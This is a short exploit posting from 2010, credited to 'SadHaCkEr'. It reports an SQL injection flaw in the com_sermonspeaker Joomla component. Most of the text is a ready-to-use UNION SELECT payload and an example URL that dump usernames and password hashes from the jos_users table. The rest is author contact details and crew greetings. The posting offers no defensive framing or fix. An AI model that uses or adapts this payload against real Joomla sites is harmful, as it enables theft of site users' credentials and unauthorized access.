# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability # Author: SadHaCkEr# Data: 2010-04-12[~]######################################### InformatioN #############################################[~]#AUTHOR:SadHaCkEr#Email: n5s@hotmail.[choose ANY ONE] IF U luckyU will Find Me #Website: http://www.sadx.297m.com/#Forum :http://v4-team.net/cc[~]######################################### ExploiT #############################################[~][~] Vulnerable:
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL][~] ExploiT :-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/[~] Example :
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/[~]######################################### ThankS To ... ############################################[~][~] Special Thanks 2:
RoMaNcYxHaCkEr, Mr.Safa7, Mn7oS & Sniper Code & Red Virus & HCJ & Mr.Wolf & ayaster & All Trayg Member .[~] Trayg Team + V4-Team + SVT Team
[~] GreetZ 2: My LoV3r + My Keyboard
[~]#########################################./Done #############################################[~]
